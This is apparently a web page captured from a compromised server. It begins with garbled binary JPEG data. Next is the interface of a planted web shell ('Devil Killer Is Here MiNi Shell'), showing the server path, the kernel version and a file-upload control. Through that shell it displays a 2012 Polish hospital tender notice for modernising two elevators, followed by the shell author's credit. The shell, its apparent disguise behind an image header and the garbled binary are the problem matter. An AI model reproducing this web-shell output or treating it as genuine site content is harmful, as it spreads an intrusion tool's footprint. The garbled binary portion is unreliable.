JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348840-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie modernizacji dwóch dźwigów szpitalnych</b><br>
<b>Numer ogłoszenia: 348840 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. Świętej Rodziny Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Madalińskiego 25, 02-544 Warszawa, woj. mazowieckie, tel. 22 4502284, faks 22 4502236.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalmadalinskiego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie modernizacji dwóch dźwigów szpitalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót będących przedmiotem zamówienia obejmuje m.in.
1 Demontaż wszystkich podzespołów istniejących dźwigów.
2 Montaż nowych podzespołów jak: zespół napędowy wraz z amortyzowanym posadowieniem i kołem zdawczym, lin nośnych wraz zawieszeniami, rama kabinowa z chwytaczami dwukierunkowymi, czujnikiem obciążenia i prowadnikami, ogranicznik prędkości wraz linką i obciążką, rama przeciwwagi z prowadnikami, prowadnice przeciwwagowe, prowadnice kabinowe, zderzaki kabinowe i przeciwwagowe, kabina wraz z wyposażeniem, drzwi szybowe i kabinowe wraz z kurtyną świetlną i progami, aparatura sterowa wraz z osprzętem i falownikiem, kable zwisowe płaskie, kasety wezwań, piętro wskazywacze zewnętrzne.
3 Zamawiający dopuszcza wykorzystanie obciążników przeciwwagi.
4 Należy wykorzystać istniejące pomieszczenie maszynowni na potrzeby instalacji nowych podzespołów z racji łatwiejszego i szybszego dostępu do kluczowych podzespołów dźwigu w przypadku sytuacji narażenia życia.
5 Doprowadzenie nowego zasilania przewodem pięciożyłowym z rozdzielnicy głównej budynku do maszynowni dźwigów.
6 Wykonanie nowej instalacji elektrycznej i oświetlenia szybów windowych.
7 Wykonanie niezbędnych robót budowlanych na zewnątrz szybu w obrębie drzwi szybowych w tym obrobienie glifów, wyrównanie ściany w miejscu starych kaset wezwań i malowanie.
8 Uruchomienie i uzyskanie dopuszczenia do eksploatacji nowych dźwigów w Urzędzie Dozoru Technicznego, łącznie z wykonaniem niezbędnych pomiarów elektrycznych i przeprowadzeniem certyfikacji urządzeń przez Jednostkę Notyfikowaną.
9 Dźwigi muszą być wykonane zgodnie z dyrektywą dźwigową i posiadać 
oznaczenie CE.
10. Urządzenia dźwigowe muszą być fabrycznie nowe, wyprodukowane nie wcześniej niż 6 miesięcy przed datą  montażu. 
11 Przeprowadzenie procesu rejestracji dźwigu w UDT wraz z poniesieniem wszelkich kosztów z tym związanych.
12  Wykonawca dokona demontażu i utylizacji dźwigów na własny koszt.
Wymagane parametry techniczne nowych dźwigów
1 Typ dźwigu samoobsługowy, elektryczny, linowy z napędem regulowanym, z istniejącą górną maszynownią,
2 Dźwig musi być energooszczędny i przystosowany do transportu łóżek szpitalnych,
3 Udźwig  min. 1500 kg,
4 Prędkość jazdy  1 ms.
5 Kabina dźwigu  wykonana ze stali nierdzewnej fakturowanej LEN, odboje na ścianach bocznych wykonane ze stali nierdzewnej na wysokości ustalonej z Zamawiającym, rama kabiny z chwytaczami dwustronnego działania wyzwalanymi ogranicznikiem prędkości 2-kierunkowego działania, zawieszenie linowe z amortyzatorami.
wymiary wewnętrzne  maksymalne możliwe do wykonania przy istniejącym szybie, ale nie mniejsze niż 2300 mm x 1390 mm. 
podłoga z wykładziny trudnościeralnej, antypoślizgowa, niepalna, sufit na całej powierzchni kabiny wykonany ze stali nierdzewnej punktowo oświetlany przez energooszczędne diody umieszczone w 2 punktach, pełniące rolę również oświetlenia awaryjnego działającego min. 2h podczas zaniku napięcia, zabezpieczone taflą szkła bezpiecznego - dostęp do oświetlenia możliwy tylko z zewnątrz. 
panel dyspozycji, wykonany z blachy nierdzewnej z piętrowskazywaczem TFT usytuowanym na ścianie bocznej, wyposażony w okrągłe przyciski podświetlane na obwodzie z oznaczeniami braill e, zawierający następujące elementy: przyciski funkcyjne, przyciski piętrowe, przycisk alarmu, przycisk wentylatora, wyświetlacz TFT z sygnalizacją przeciążenia i komunikatami serwisowymi, tabliczkę znamionową, wentylator, kamera kolorowa podłączona do telewizji przemysłowej Zamawiającego, lustro umieszczone na połowie górnej powierzchni tylnej ściany, okrągła poręcz umieszczona na ścianach bocznych: lewej i prawej oraz tylnej na wysokości 90 cm ze stali nierdzewnej,przyciski w panelu dyspozycji, jak i kasetach wezwań zainstalowane na wysokości zgodnej z wymogami  dla osób niepełnosprawnych.
6  Drzwi przystankowe 
Automatyczne 4-panelowe centralne o szerokości minimum 1200 mm, standard wykonania: stal nierdzewna: LEN, klasa ognioodporności: EI-60.
7 Wyłożenie wnęk drzwi przystankowych panelami z blachy nierdzewnej, obudowanie ościeży na całej wysokości i szerokości z wyłożeniem blachy nierdzewnej na ścianach na szerokość co najmniej 20 cm (portale ze stali nierdzewnej), zgodnie z rysunkiem znajdującym się w dokumentacji technicznej zał. nr 5 do SIWZ.
8 Drzwi kabinowe  automatyczne 4panelowe centralne o szerokości minimum 1200 mm, standard wykonania: stal nierdzewna: LEN, wyposażone w funkcję zmniejszonego poboru energii w przypadku postoju dźwigu.
9 Elektroniczny piętrowskazywacze i przycisk wezwań na  wszystkich przystankach umieszczone w portalu ze stali nierdzewnej.
10 Maszynownia  dotychczasowa górna należy przewidzieć remont maszynowni polegający na wykonaniu wentylacji, oświetlenia oraz wykonać  niezbędnych prac budowlane.
11 Wykonanie automatycznej mechanicznej wentylacji w maszynowni.
12 System powiadamiania ekip ratowniczych uruchamiany w przypadku awarii dźwigu oparty na komunikacji GSM. Wymagana automatyczna informacja o awarii dźwigu do działu serwisu w przypadku przewozu osoby niepełnosprawnej np. głuchoniemej lub bezwładnych (zalecana transmisja siecią GSM z racji obsługi takiego monitoringu przez konserwatora oraz powiadamianie SMS służby techniczne zamawiającego  o awarii dźwigu.
13 Napęd dźwigu energooszczędny - bezreduktorowy o wysokiej sprawności, regulowany falownikiem o mocy max 11 kW + - 5%, linowy w układzie 2:1, przeznaczony do pracy ciężkiej minimum 240 włączeń na godzinę. 
14 Regulacja prędkości za pomocą falownika odpowiadającego za płynny start i proces zatrzymania się kabiny z dokładnością do 5mm względem przystanku
15 Nowe prowadnice o profilu teownikowym.
16 Zjazd awaryjny pozwalający na dojazd kabiny do najbliższego przystanku w przypadku wykrycia braku zasilania w budynku. 
17 Aparatura sterowa mikroprocesorowa dostosowana do podłączenia dźwigu  do systemu p.poż., z możliwością zapamiętywania wykrytych przez sterownik ostatnich kilkuset błędów pomagających w analizie usterek zabrania się kodowania aparatur sterowych oraz stosowania innych np. mechanicznych zabezpieczeń. W przypadku, gdy wymaga się do obsługi stosowania konsolek serwisowych, należy je dostarczyć Zamawiającemu wraz z całym urządzeniem. Wymaga się funkcji:
a. jazda pożarowa  uruchamiana w przypadku wykrycia pożaru przez system p.poż aktualnie zainstalowany na obiekcie doprowadzenie sygnału od centrali p.poż. do maszynowni, zjazd windy na poziom ewakuacji tj. wysoki parter , 
b. zbiorczość w góra dół ,
c. zdalnej komunikacji poprzez sieć GSM z konserwatorem umożliwiającej wgląd do parametrów dźwigu, odczyt błędów i zmianę konfiguracji podstawowych parametrów,
d. automatycznego powiadamiania o awarii ekipy ratowniczej za pomocą sieci GSM,
e. możliwość połączenia poprzez interkom zamontowany w panelu  sterowniczym kabiny dźwigu z portiernią,
f. funkcja jazdy szpitalnej uruchamiana za  pomocą kluczyka.
18 Wykonawca robót udzieli Zamawiającemu pisemnej gwarancji  na  okres:
 minimum 36 miesięcy na roboty budowlane oraz
minimum 60 miesięcy na dostarczone i zamontowane urządzenia dźwigowe a także przez okres ten zapewni bezpłatny serwis urządzeń dźwigowych, w którego skład wchodzić będą m.in. co roczne przeglądy, pomiary, robocizna, dojazdy, części zamienne oraz coroczne koszty opłaty UDT.
19 Dźwigi muszą być wyposażone w urządzenia kontroli dostępu   który jest obecnie używany przez Zamawiającego KanTech.
20 Prace należy wykonać zgodnie z dokumentacją techniczną i  przedmiarem robót i SIWZ.
21 Szczegółowy opis przedmiotu zamówienia jest zawarty w dokumentacji technicznej  wykonania robót  zał. nr 5 do SIWZ oraz przedmiarze robót zał. nr 4 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku wykonawcy wykażą, że posiadają wiedzę i doświadczenie, a w szczególności w okresie 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali  modernizacje co najmniej 3 dźwigów polegające na wymianie kabiny, napędu i osprzętu sterującego w czynnych budynkach użyteczności publicznej i o wartości co najmniej 200 000,00 złotych brutto każda, w tym co najmniej 1 robotę w czynnym budynku Szpitala</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku wykonawcy wykażą, że w szczególności dysponują następującymi osobami:
 - dysponują osobą zdolną do pełnienia funkcji kierownika budowy, posiadającą odpowiednie uprawnienia określone przepisami prawa budowlanego, należącą do właściwej miejscowo izby samorządu budowlanego i posiadającą udokumentowaną co najmniej 5-letnią praktykę zawodową oraz doświadczenie w kierowaniu co najmniej 1 robotą w zakresie modernizacji dźwigów  odpowiadającą swoim rodzajem robotom objętym zamówieniem,
- dysponują kierownikiem robót w branży elektrycznej posiadającą odpowiednie uprawnienia określone przepisami prawa budowlanego, należącą do właściwej miejscowo izby samorządu budowlanego i posiadającą udokumentowaną co najmniej 5-letnią praktykę zawodową oraz doświadczenie w kierowaniu co najmniej 1 robotą w zakresie modernizacji dźwigów  odpowiadającą swoim rodzajem robotom objętym zamówieniem
- dysponują osobami posiadającymi uprawnienia elektryczne SEP do 1 kV dozorowe i eksploatacyjne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku wykonawcy wykażą, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności posiadają środki własne lub zdolność kredytową w wysokości nie mniejszej niż  400 000 zł oraz są ubezpieczeni od odpowiedzialności cywilnej kontraktowej i deliktowej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 500 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty sporządzony według wzoru podanego w Załączniku nr 1 do SIWZ.
2. Formularz informacyjny zespołów dźwigowych wg wzoru podanego w załączniku nr 3 do  SIWZ wraz z atestami i certyfikatami.
3. Przedmiar robót wg wzoru podanego w załączniku nr 4 do SIWZ.
4. Potwierdzenie wniesienia wadium.
5. Dokument, w którym wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają wykonawcy występujący wspólnie.
6. Pełnomocnictwo do podpisania oferty, jeżeli jest ona podpisana przez osobę lub osoby nie wymienione w dokumencie określającym status prawny wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający i Wykonawca dopuszczają możliwość dokonania zmian postanowień umowy w następujących przypadkach:
a)		Zmiany terminu wykonania zamówienia w razie zaistnienia okoliczności określonych w § 2. ust. 3.,
b)		Zmiany godzin wykonywania prac określonych w § 2. ust. 5.,
c)		Zmiany kolejności lub terminów zakończenia etapów robót wymienionych w harmonogramie rzeczowo - finansowym w razie zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub wynikających z przyczyn technicznych, technologicznych lub organizacyjnych,
d)		Zmiany zakresu robót wykonywanych przez podwykonawców.
e) zmiany osób, które zostały wskazane w § 6 ust. 1, pod warunkiem, iż osoby je zastępujące spełnią co najmniej równoważne kwalifikacje i doświadczenie określone w SIWZ,
f)		Zmiany stawki podatku VAT, przy czym kwota brutto umowy pozostaje bez zmian,
g)		Zmiany przewidzianych w dokumentacji technicznej materiałów lub urządzeń, której konieczność zaistniała wskutek okoliczności niemożliwych do przewidzenia w chwili zawierania umowy, jeżeli zmiana ta nie doprowadzi do obniżenia standardu wykonania robót oraz nie będzie skutkowała roszczeniem o podwyższenie wynagrodzenia umownego określonego w §7 ust. 1. 
2.	Wszelkie zmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmadalinskiego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 02-544 Warszawa, ul. Madalińskiego 25,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 10:00, miejsce: Siedziba Zamawiającego; Warszawa, ul. Madalińskiego 25, Sekretariat Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com